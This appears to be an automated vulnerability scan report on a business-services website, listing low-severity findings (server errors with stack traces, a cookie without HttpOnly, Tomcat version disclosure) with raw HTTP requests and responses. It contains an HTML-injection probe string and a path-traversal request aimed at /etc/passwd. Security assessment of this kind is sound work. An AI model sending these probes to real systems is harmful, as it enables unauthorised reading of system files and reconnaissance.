No such flow definition with id &#039;&#039;&#034;&gt;&lt;net sparker=netsparker(0x00040C)&gt;&#039; found; the flows available are: array&lt;String&gt;[&#039;accountAdmin-flow&#039;, &#039;accountreg-flow&#039;, &#039;businessprofile-flow&#039;, &#039;client-consolidation-flow&#039;, &#039;contactus-flow&#039;, &#039;coupon-flow&#039;, &#039;forgotpassword-edit-flow&#039;, &#039;funding-flow&#039;, &#039;lead-maintain-flow&#039;, &#039;listingOrderSummary-flow&#039;, &#039;login-flow&#039;, &#039;loginact-flow&#039;, &#039;maintaincreditcard-flow&#039;, &#039;microsite-flow&#039;, &#039;myaccount-contactinfo-edit-flow&#039;, &#039;myaccount-domains-flow&#039;, &#039;myaccount-email-edit-flow&#039;, &#039;myaccount-emails-flow&#039;, &#039;myaccount-flow&#039;, &#039;myaccount-password-edit-flow&#039;, &#039;myaccount-websites-flow&#039;, &#039;onlinecc-flow&#039;, &#039;ordersummary-flow&#039;, &#039;paypercall-flow&#039;, &#039;pfc-businessprofile-flow&#039;, &#039;pfc-flow&#039;, &#039;pfp-adDesign-flow&#039;, &#039;pfp-categories-flow&#039;, &#039;pfp-elp-flow&#039;, &#039;pfp-geo-flow&#039;, &#039;pfp-keywords-flow&#039;, &#039;photos-flow&#039;, &#039;ppc-advsearch-flow&#039;, &#039;ppc-bidding-flow&#039;, &#039;ppc-create-flow&#039;, &#039;ppc-fullservice-flow&#039;, &#039;ppc-maintain-flow&#039;, &#039;repmanagement-flow&#039;, &#039;reviews-flow&#039;, &#039;sclicks-maintain-flow&#039;, &#039;sharethewealth-flow&#039;, &#039;temporary-password-flow&#039;, &#039;webhosting-addons-flow&#039;, &#039;webhosting-design-flow&#039;, &#039;webhosting-domainnames-flow&#039;, &#039;webhosting-email-products-flow&#039;, &#039;webhosting-websites-flow&#039;]
</div>

</div>
</div>
<div >























<!-- Footer Start -->

<!-- DROP DOWN START -->
<div id="dropDownShadow" ></div>
<div id="dropDownHolder" class="dropDownNavHolder">
</div>
<div class="nodisplay">
<div class="dropdown-content" id="online-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/business-listings/listing-enhancements-packages">Click packages</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/do-it-yourself">Do-it-yourself search marketing</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/services">Search marketing services</a></li>
<li><a href="https://www.supermedia.com/video-ads">Video ads</a></li>
<li><a href="https://www.supermedia.com/business-listings">Business listings</a></li>
<li><a href="https://www.supermedia.com/reputation-monitoring">Reputation monitoring</a></li>
<li><a href="https://www.supermedia.com/business-listings/coupons">Coupons</a></li>
</ul>
</div>

<div class="dropdown-content" id="print-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/print-advertising/yellow-pages">Yellow pages</a></li>
<li><a href="https://www.supermedia.com/print-advertising/white-pages">White pages</a></li>
<li><a href="https://www.supermedia.com/directory-options">Directory options</a></li>
</ul>
</div>

<div class="dropdown-content" id="direct-mail-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/direct-mail/postcards">Postcards</a></li>
<li><a href="https://www.supermedia.com/direct-mail/shared-card-packs">Shared card packs</a></li>
<li><a href="https://www.supermedia.com/direct-mail/call-tracking">Call tracking</a></li>
<li><a href="https://www.supermedia.com/direct-mail/compare-direct-mail-options">Compare options</a></li>
</ul>
</div>

<div class="dropdown-content" id="web-site-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/web-design">Web site design</a></li>
<li><a href="https://www.supermedia.com/web-hosting">Web site hosting</a></li>
<li><a href="https://www.supermedia.com/domain-names">Domain names</a></li>
<li><a href="https://www.supermedia.com/business-email">Business email</a></li>
</ul>
</div>

<div class="dropdown-content" id="packaged-solutions-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/packaged-solutions/multi-product-packages">Multi-product packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/business-profile-packages">Business profile packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/auto-dealer-packages">Auto dealer packages</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();

//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);

//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).html());
$("#dropDownHolder").show();
addDropDownShadow();
});
$(this).mouseout(function(){
setDropDownTimer();
});
}
});
$("#dropDownHolder a").mouseover(function(){
clearDropDownTimer();
});
$("#dropDownHolder").mouseout(function(){
clearDropDownTimer();
setDropDownTimer();
});
$("#dropDownHolder").mouseover..
Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The server responded with an HTTP status 500, which indicates a server-side error. The reasons may vary, so the behaviour should be analysed carefully. If Netsparker is able to find a security issue in the same resource, it will report it as a separate vulnerability.

Impact

The impact varies depending on the underlying condition. Generally this indicates poor coding practices: insufficient error checking, sanitisation and whitelisting. However, there might be a bigger issue such as SQL Injection; if that is the case, Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code so that unexpected errors are handled. This should be a generic practice that does not disclose further information when an error occurs; all errors should be handled on the server side only.
- /spportal/spportalFlow.do

/spportal/spportalFlow.do CONFIRMED

https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=_cD8CD9E7F-2CE0-BAC0-8E3D-C3DC..

Parameters

Parameter Type Value
_flowExecutionKey GET _cD8CD9E7F-2CE0-BAC0-8E3D-C3DCB27FFA09_kBF1EB9ED-E594-C86C-D15F-96C1705501CF

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=_cD8CD9E7F-2CE0-BAC0-8E3D-C3DCB27FFA09_kBF1EB9ED-E594-C86C-D15F-96C1705501CF HTTP/1.1
Referer: https://www.supermedia.com/spportal/spportalFlow.do?fromPage=index&username=&password=&&_flowId=loginact-flow
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Server: Unspecified
Date: Sat, 19 Mar 2011 11:58:42 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Cache-Control: private
Content-Encoding:
Content-Length: 1642


<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>org.apache.jasper.JasperException: Invalid property 'customerProfile' of bean class [com.idearc.ssa.web.spring.AccountSetupFormWrapper]: Value of nested property 'customerProfile' is null org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:460) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:373) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:329) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:265) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) org.springframework.web.servlet.view.InternalResourceView.renderMergedOutputModel(InternalResourceView.java:142) org.springframework.web.servlet.view.AbstractView.render(AbstractView.java:243) org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1141) org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:878) org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:792) 
org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:475) org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:430) javax.servlet.http.HttpServlet.service(HttpServlet.java:690) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) com.idearc.ssa.web.filter.SessionManager.doFilter(SessionManager.java:117) com.idearc.ssa.web.filter.CharsetFilter.doFilter(CharsetFilter.java:33) org.acegisecurity.securechannel.ChannelProcessingFilter.doFilter(ChannelProcessingFilter.java:138) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:264) org.acegisecurity.intercept.web.FilterSecurityInterceptor.invoke(FilterSecurityInterceptor.java:107) org.acegisecurity.intercept.web.FilterSecurityInterceptor.doFilter(FilterSecurityInterceptor.java:72) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:110) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.providers.anonymous.AnonymousProcessingFilter.doFilter(AnonymousProcessingFilter.java:125) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.wrapper.SecurityContextHolderAwareRequestFilter.doFilter(SecurityContextHolderAwareRequestFilter.java:81) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.AbstractProcessingFilter.doFilter(AbstractProcessingFilter.java:217) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.logout.LogoutFilter.doFilter(LogoutFilter.java:106) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) 
org.acegisecurity.context.HttpSessionContextIntegrationFilter.doFilter(HttpSessionContextIntegrationFilter.java:229) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.util.FilterChainProxy.doFilter(FilterChainProxy.java:148) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) com.opensymphony.module.sitemesh.filter.PageFilter.parsePage(PageFilter.java:119) com.opensymphony.module.sitemesh.filter.PageFilter.doFilter(PageFilter.java:55) com.idearc.ssa.web.omniture.OmnitureFilter.doFilter(OmnitureFilter.java:46)</pre></p><p><b>root cause</b> <pre>org.springframework.beans.NullValueInNestedPathException: Invalid property 'customerProfile' of bean class [com.idearc.ssa.web.spring.AccountSetupFormWrapper]: Value of nested property 'customerProfile' is null org.springframework.beans.BeanWrapperImpl.getNestedBeanWrapper(BeanWrapperImpl.java:443) org.springframework.beans.BeanWrapperImpl.getBeanWrapperForPropertyPath(BeanWrapperImpl.java:418) org.springframework.beans.BeanWrapperImpl.getPropertyValue(BeanWrapperImpl.java:524) org.springframework.validation.AbstractPropertyBindingResult.getActualFieldValue(AbstractPropertyBindingResult.java:77) org.springframework.validation.AbstractBindingResult.getFieldValue(AbstractBindingResult.java:337) org.springframework.validation.BindException.getFieldValue(BindException.java:206) org.springframework.web.servlet.support.BindStatus.&lt;init&gt;(BindStatus.java:117) org.springframework.web.servlet.tags.BindTag.doStartTagInternal(BindTag.java:116) org.springframework.web.servlet.tags.RequestContextAwareTag.doStartTag(RequestContextAwareTag.java:77) org.apache.jsp.jsp.accountsetup_jsp._jspService(accountsetup_jsp.java:565) org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:98) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:331) 
org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:329) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:265) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) org.springframework.web.servlet.view.InternalResourceView.renderMergedOutputModel(InternalResourceView.java:142) org.springframework.web.servlet.view.AbstractView.render(AbstractView.java:243) org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1141) org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:878) org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:792) org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:475) org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:430) javax.servlet.http.HttpServlet.service(HttpServlet.java:690) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) com.idearc.ssa.web.filter.SessionManager.doFilter(SessionManager.java:117) com.idearc.ssa.web.filter.CharsetFilter.doFilter(CharsetFilter.java:33) org.acegisecurity.securechannel.ChannelProcessingFilter.doFilter(ChannelProcessingFilter.java:138) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:264) org.acegisecurity.intercept.web.FilterSecurityInterceptor.invoke(FilterSecurityInterceptor.java:107) org.acegisecurity.intercept.web.FilterSecurityInterceptor.doFilter(FilterSecurityInterceptor.java:72) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:110) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.providers.anonymous.AnonymousProcessingFilter.doFilter(AnonymousProcessingFilter.java:125) 
org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.wrapper.SecurityContextHolderAwareRequestFilter.doFilter(SecurityContextHolderAwareRequestFilter.java:81) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.AbstractProcessingFilter.doFilter(AbstractProcessingFilter.java:217) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.logout.LogoutFilter.doFilter(LogoutFilter.java:106) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.context.HttpSessionContextIntegrationFilter.doFilter(HttpSessionContextIntegrationFilter.java:229) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.util.FilterChainProxy.doFilter(FilterChainProxy.java:148) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) com.opensymphony.module.sitemesh.filter.PageFilter.parsePage(PageFilter.java:119) com.opensymphony.module.sitemesh.filter.PageFilter.doFilter(PageFilter.java:55) com.idearc.ssa.web.omniture.OmnitureFilter.doFilter(OmnitureFilter.java:46)</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/5.5.25 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>
Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
The cookie was not marked as HTTPOnly. HTTPOnly cookies cannot be read by client-side scripts, so marking a cookie as HTTPOnly provides an additional layer of protection against Cross-site Scripting attacks.

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for the solution.
  2. Consider marking all of the cookies used by the application as HTTPOnly (after this change, JavaScript code will not be able to read the cookies).

Remedy

Mark the cookie as HTTPOnly. This is an extra layer of defence against XSS; however, it is not a silver bullet and will not protect the system against Cross-site Scripting attacks themselves. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

- /spportal/spportalFlow.do

/spportal/spportalFlow.do CONFIRMED

http://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow

Identified Cookie

JSESSIONID

Request

GET /spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Moved Temporarily
Server: Unspecified
Date: Sat, 19 Mar 2011 11:57:02 GMT
Set-Cookie: JSESSIONID=D61798579F75CB8CC29455B745D6534F.app8-a1; Path=/,NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660;path=/;httponly
Location: https://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow
Content-Length: 0
Connection: close


Tomcat Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is Tomcat. This information was gathered from the HTTP Headers.

Impact

An attacker can look up known security vulnerabilities for the version disclosed by the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response. Note that in this instance the SERVER header is already set to "Unspecified" and the version was extracted from the body of the default Tomcat error page, so a custom error page (see the Internal Server Error finding above) is also required to remove the disclosure.
- /spportal/spportalFlow.do

/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=_cD8CD9E7F-2CE0-BAC0-8E3D-C3DC..

Extracted Version

Apache Tomcat/5.5.25

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=_cD8CD9E7F-2CE0-BAC0-8E3D-C3DCB27FFA09_kBF1EB9ED-E594-C86C-D15F-96C1705501CF HTTP/1.1
Referer: https://www.supermedia.com/spportal/spportalFlow.do?fromPage=index&username=&password=&&_flowId=loginact-flow
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Server: Unspecified
Date: Sat, 19 Mar 2011 11:58:42 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Cache-Control: private
Content-Encoding:
Content-Length: 1642


<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>org.apache.jasper.JasperException: Invalid property 'customerProfile' of bean class [com.idearc.ssa.web.spring.AccountSetupFormWrapper]: Value of nested property 'customerProfile' is null org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:460) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:373) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:329) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:265) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) org.springframework.web.servlet.view.InternalResourceView.renderMergedOutputModel(InternalResourceView.java:142) org.springframework.web.servlet.view.AbstractView.render(AbstractView.java:243) org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1141) org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:878) org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:792) 
org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:475) org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:430) javax.servlet.http.HttpServlet.service(HttpServlet.java:690) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) com.idearc.ssa.web.filter.SessionManager.doFilter(SessionManager.java:117) com.idearc.ssa.web.filter.CharsetFilter.doFilter(CharsetFilter.java:33) org.acegisecurity.securechannel.ChannelProcessingFilter.doFilter(ChannelProcessingFilter.java:138) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:264) org.acegisecurity.intercept.web.FilterSecurityInterceptor.invoke(FilterSecurityInterceptor.java:107) org.acegisecurity.intercept.web.FilterSecurityInterceptor.doFilter(FilterSecurityInterceptor.java:72) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:110) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.providers.anonymous.AnonymousProcessingFilter.doFilter(AnonymousProcessingFilter.java:125) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.wrapper.SecurityContextHolderAwareRequestFilter.doFilter(SecurityContextHolderAwareRequestFilter.java:81) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.AbstractProcessingFilter.doFilter(AbstractProcessingFilter.java:217) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.logout.LogoutFilter.doFilter(LogoutFilter.java:106) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) 
org.acegisecurity.context.HttpSessionContextIntegrationFilter.doFilter(HttpSessionContextIntegrationFilter.java:229) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.util.FilterChainProxy.doFilter(FilterChainProxy.java:148) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) com.opensymphony.module.sitemesh.filter.PageFilter.parsePage(PageFilter.java:119) com.opensymphony.module.sitemesh.filter.PageFilter.doFilter(PageFilter.java:55) com.idearc.ssa.web.omniture.OmnitureFilter.doFilter(OmnitureFilter.java:46)</pre></p><p><b>root cause</b> <pre>org.springframework.beans.NullValueInNestedPathException: Invalid property 'customerProfile' of bean class [com.idearc.ssa.web.spring.AccountSetupFormWrapper]: Value of nested property 'customerProfile' is null org.springframework.beans.BeanWrapperImpl.getNestedBeanWrapper(BeanWrapperImpl.java:443) org.springframework.beans.BeanWrapperImpl.getBeanWrapperForPropertyPath(BeanWrapperImpl.java:418) org.springframework.beans.BeanWrapperImpl.getPropertyValue(BeanWrapperImpl.java:524) org.springframework.validation.AbstractPropertyBindingResult.getActualFieldValue(AbstractPropertyBindingResult.java:77) org.springframework.validation.AbstractBindingResult.getFieldValue(AbstractBindingResult.java:337) org.springframework.validation.BindException.getFieldValue(BindException.java:206) org.springframework.web.servlet.support.BindStatus.&lt;init&gt;(BindStatus.java:117) org.springframework.web.servlet.tags.BindTag.doStartTagInternal(BindTag.java:116) org.springframework.web.servlet.tags.RequestContextAwareTag.doStartTag(RequestContextAwareTag.java:77) org.apache.jsp.jsp.accountsetup_jsp._jspService(accountsetup_jsp.java:565) org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:98) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:331) 
org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:329) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:265) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) org.springframework.web.servlet.view.InternalResourceView.renderMergedOutputModel(InternalResourceView.java:142) org.springframework.web.servlet.view.AbstractView.render(AbstractView.java:243) org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1141) org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:878) org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:792) org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:475) org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:430) javax.servlet.http.HttpServlet.service(HttpServlet.java:690) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) com.idearc.ssa.web.filter.SessionManager.doFilter(SessionManager.java:117) com.idearc.ssa.web.filter.CharsetFilter.doFilter(CharsetFilter.java:33) org.acegisecurity.securechannel.ChannelProcessingFilter.doFilter(ChannelProcessingFilter.java:138) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:264) org.acegisecurity.intercept.web.FilterSecurityInterceptor.invoke(FilterSecurityInterceptor.java:107) org.acegisecurity.intercept.web.FilterSecurityInterceptor.doFilter(FilterSecurityInterceptor.java:72) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:110) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.providers.anonymous.AnonymousProcessingFilter.doFilter(AnonymousProcessingFilter.java:125) 
org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.wrapper.SecurityContextHolderAwareRequestFilter.doFilter(SecurityContextHolderAwareRequestFilter.java:81) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.AbstractProcessingFilter.doFilter(AbstractProcessingFilter.java:217) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.logout.LogoutFilter.doFilter(LogoutFilter.java:106) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.context.HttpSessionContextIntegrationFilter.doFilter(HttpSessionContextIntegrationFilter.java:229) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.util.FilterChainProxy.doFilter(FilterChainProxy.java:148) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) com.opensymphony.module.sitemesh.filter.PageFilter.parsePage(PageFilter.java:119) com.opensymphony.module.sitemesh.filter.PageFilter.doFilter(PageFilter.java:55) com.idearc.ssa.web.omniture.OmnitureFilter.doFilter(OmnitureFilter.java:46)</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/5.5.25 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>
Database Error Message

1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information, which an attacker can use to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue to an SQL Injection vulnerability; most of the time Netsparker will detect and report that problem separately.

Remedy

Do not display error messages in production environments. Log errors with a reference number to a backend store such as a text file or database, then show the user only this number and a static, user-friendly error message.
- /spportal/spportalFlow.do

/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?_flowId=../../../../../CANTBEHERE/../../../../....

Parameters

Parameter Type Value
_flowId GET ../../../../../CANTBEHERE/../../../../../../etc/passwd

Request

GET /spportal/spportalFlow.do?_flowId=../../../../../CANTBEHERE/../../../../../../etc/passwd HTTP/1.1
Referer: https://www.supermedia.com/spportal/forgotPwd.do
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
